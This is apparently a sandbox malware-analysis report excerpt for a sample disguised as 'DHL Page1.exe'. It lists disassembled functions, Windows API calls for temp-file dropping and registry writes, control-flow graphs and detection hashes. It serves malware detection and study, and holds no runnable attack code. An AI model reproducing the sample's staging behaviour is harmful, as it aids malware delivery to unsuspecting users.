                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\nsv4331.tmp$C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll$Call
                                              • API String ID: 1941528284-3511587426
                                              • Opcode ID: 4f3913196afc35370aff70a88b408c4098ea441a68e99e2207c7708e4b16c304
                                              • Instruction ID: e6f05f3904b1859601f1eb2940c1b1717384ade9966e36b1bb5c3cc2a0af8de2
                                              • Opcode Fuzzy Hash: 4f3913196afc35370aff70a88b408c4098ea441a68e99e2207c7708e4b16c304
                                              • Instruction Fuzzy Hash: 4941D471900518BACF107FA5CD45EAF3A79EF45368B20423FF522B10E1DB3C8A519A6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 822 405393-4053a8 823 4053ae-4053bf 822->823 824 40545f-405463 822->824 825 4053c1-4053c5 call 406256 823->825 826 4053ca-4053d6 lstrlenW 823->826 825->826 828 4053f3-4053f7 826->828 829 4053d8-4053e8 lstrlenW 826->829 831 405406-40540a 828->831 832 4053f9-405400 SetWindowTextW 828->832 829->824 830 4053ea-4053ee lstrcatW 829->830 830->828 833 405450-405452 831->833 834 40540c-40544e SendMessageW * 3 831->834 832->831 833->824 835 405454-405457 833->835 834->833 835->824
                                              APIs
                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
                                              • lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll
                                              • API String ID: 2531174081-233680663
                                              • Opcode ID: 26d9079ffcafc08359c587dfddb640d82b2c93ffd26b5b2690ef6886057d76cb
                                              • Instruction ID: 904dcc14be42eb9ecd8d2d74964ba25456134f8d930e436489d38a2ea5572984
                                              • Opcode Fuzzy Hash: 26d9079ffcafc08359c587dfddb640d82b2c93ffd26b5b2690ef6886057d76cb
                                              • Instruction Fuzzy Hash: D7219D71900518BACB11AF95DD84ACFBFB9EF49754F10807AFA04B22A1C7794A90CF68

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 836 4032a5-4032cd GetTickCount 837 4032d3-4032fe call 403424 SetFilePointer 836->837 838 4033fd-403405 call 402e33 836->838 843 403303-403315 837->843 844 403407-40340b 838->844 845 403317 843->845 846 403319-403327 call 40340e 843->846 845->846 849 40332d-403339 846->849 850 4033ef-4033f2 846->850 851 40333f-403345 849->851 850->844 852 403370-40338c call 40672d 851->852 853 403347-40334d 851->853 859 4033f8 852->859 860 40338e-403396 852->860 853->852 854 40334f-40336f call 402e33 853->854 854->852 861 4033fa-4033fb 859->861 862 403398-4033a0 call 405ebb 860->862 863 4033b9-4033bf 860->863 861->844 866 4033a5-4033a7 862->866 863->859 865 4033c1-4033c3 863->865 865->859 867 4033c5-4033d8 865->867 868 4033f4-4033f6 866->868 869 4033a9-4033b5 866->869 867->843 870 4033de-4033ed SetFilePointer 867->870 868->861 869->851 871 4033b7 869->871 870->838 871->867
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 004032B9
                                                • Part of subcall function 00403424: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403124,?), ref: 00403432
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031CF,00000004,00000000,00000000,?,?,0040314B,000000FF,00000000,00000000,0040A230,?), ref: 004032EC
                                              • SetFilePointer.KERNELBASE(000066A1,00000000,00000000,0A,0041EA30,00004000,?,00000000,004031CF,00000004,00000000,00000000,?,?,0040314B,000000FF), ref: 004033E7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FilePointer$CountTick
                                              • String ID: 0jA$0A$0A
                                              • API String ID: 1092082344-3318826540
                                              • Opcode ID: ce0f25341845d2d3b1ec7cd88536509013ef739379c7664023bb692e7d00efca
                                              • Instruction ID: a8c061a94c289a4b900e1fa10581d26637340338de3d2ebac52199189ebde602
                                              • Opcode Fuzzy Hash: ce0f25341845d2d3b1ec7cd88536509013ef739379c7664023bb692e7d00efca
                                              • Instruction Fuzzy Hash: EE316D72600201EFD7349F69EFC592A3FA8E751356754023BE801B6AE0CBB89941DB9D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 872 405862-4058ad CreateDirectoryW 873 4058b3-4058c0 GetLastError 872->873 874 4058af-4058b1 872->874 875 4058da-4058dc 873->875 876 4058c2-4058d6 SetFileSecurityW 873->876 874->875 876->874 877 4058d8 GetLastError 876->877 877->875
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004058A5
                                              • GetLastError.KERNEL32 ref: 004058B9
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058CE
                                              • GetLastError.KERNEL32 ref: 004058D8
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405888
                                              • C:\Users\user\Desktop, xrefs: 00405862
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                              • API String ID: 3449924974-26219170
                                              • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                              • Instruction ID: 93ef74410eabf74c9f5bfa93548421830951063b51e5df95971d9266e6c6e1f8
                                              • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                              • Instruction Fuzzy Hash: 53011A72D00619EAEF119FA0CA447EFBBB8EF04344F10803ADA45F6280D7789614CFA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 878 40659e-4065be GetSystemDirectoryW 879 4065c0 878->879 880 4065c2-4065c4 878->880 879->880 881 4065d5-4065d7 880->881 882 4065c6-4065cf 880->882 884 4065d8-40660b wsprintfW LoadLibraryExW 881->884 882->881 883 4065d1-4065d3 882->883 883->884
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065B5
                                              • wsprintfW.USER32 ref: 004065F0
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406604
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                              • Instruction ID: 1dc8b8010af983826084558677c073d96b5143d4abd8efd7bb109387f395bce7
                                              • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                              • Instruction Fuzzy Hash: 3DF0F670510229BADB20AB64ED0EF9B366CAB00305F50403AA546F10D0FF78DB29CBA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 885 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 892 402436-40243e 885->892 893 402adb-402aea 885->893 894 402440-40244d call 402c53 lstrlenW 892->894 895 402451-402454 892->895 894->895 898 402456-402467 call 402c31 895->898 899 402468-40246b 895->899 898->899 903 40247c-402490 RegSetValueExW 899->903 904 40246d-402477 call 40319d 899->904 907 402492 903->907 908 402495-402573 RegCloseKey 903->908 904->903 907->908 908->893 910 4028a1-4028a8 908->910 910->893
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv4331.tmp
                                              • API String ID: 1356686001-2145028349
                                              • Opcode ID: 9fb46ae10ccb980b72cb62b64bc586aab50fc90a6667cfc23588e109db3e8db1
                                              • Instruction ID: 1243140a8c18a0bfbd33b88d0d7f89bc38a26af17d7c8fd6f4b1eeef8c21712f
                                              • Opcode Fuzzy Hash: 9fb46ae10ccb980b72cb62b64bc586aab50fc90a6667cfc23588e109db3e8db1
                                              • Instruction Fuzzy Hash: 3D216F71D00118BEEB00AFA1DE89EAF7B78EB44398F11403AF505B71D1D7B88D419B28

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 911 405e38-405e44 912 405e45-405e79 GetTickCount GetTempFileNameW 911->912 913 405e88-405e8a 912->913 914 405e7b-405e7d 912->914 916 405e82-405e85 913->916 914->912 915 405e7f 914->915 915->916
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405E56
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL Page1.exe",0040346A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405E71
                                              Strings
                                              • "C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00405E38
                                              • nsa, xrefs: 00405E45
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E3D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-3380365781
                                              • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                              • Instruction ID: 1e1b0ee3726139050bbb5f95774bfa2ccdd562767932c9ee3624734809f60390
                                              • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                              • Instruction Fuzzy Hash: B9F06D7A600608BFDB008B59DE05AABBBA8EB91710F10443AEE44F7180E6B09A548B64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 917 402c93-402cbc RegOpenKeyExW 918 402d27-402d2b 917->918 919 402cbe-402cc9 917->919 920 402ce4-402cf4 RegEnumKeyW 919->920 921 402cf6-402d08 RegCloseKey call 40660e 920->921 922 402ccb-402cce 920->922 929 402d0a-402d19 921->929 930 402d2e-402d34 921->930 924 402cd0-402ce2 call 402c93 922->924 925 402d1b-402d1e RegCloseKey 922->925 924->920 924->921 927 402d24-402d26 925->927 927->918 929->918 930->927 932 402d36-402d44 RegDeleteKeyW 930->932 932->927 934 402d46 932->934 934->918
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                              • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                              • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 52e95f4ee33b084a847098dca0b6bc6075d283d936cc9c0cdb912d4f1af94a51
                                              • Instruction ID: 1a620f8704b1326881f6e1d7686825e2d06aecdcbe48d7084eb45f1d79456e14
                                              • Opcode Fuzzy Hash: 52e95f4ee33b084a847098dca0b6bc6075d283d936cc9c0cdb912d4f1af94a51
                                              • Instruction Fuzzy Hash: 2111377150010CBFEF219F90DE89DAE7B6DFB54348F10003AFA01A11E0D7B59E69AA29
                                              APIs
                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                              • String ID:
                                              • API String ID: 1791698881-3916222277
                                              • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                              • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                              • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                              • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: d0dd36373e58090cc10c8e7865d3dfed9077db1d0cdb3b09aea54bad34b303c4
                                              • Instruction ID: 46d8feb468198c86c3f965ed66e07e593edd6f9980b7d84e6d51a540c602a89e
                                              • Opcode Fuzzy Hash: d0dd36373e58090cc10c8e7865d3dfed9077db1d0cdb3b09aea54bad34b303c4
                                              • Instruction Fuzzy Hash: BF21C171908219AEEF04AFA4DE4AABE7BB4EF44304F14453EF505BA1D0D7B88541DB18
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612B
                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614C
                                              • RegCloseKey.ADVAPI32(?,?,00406374,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040616F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
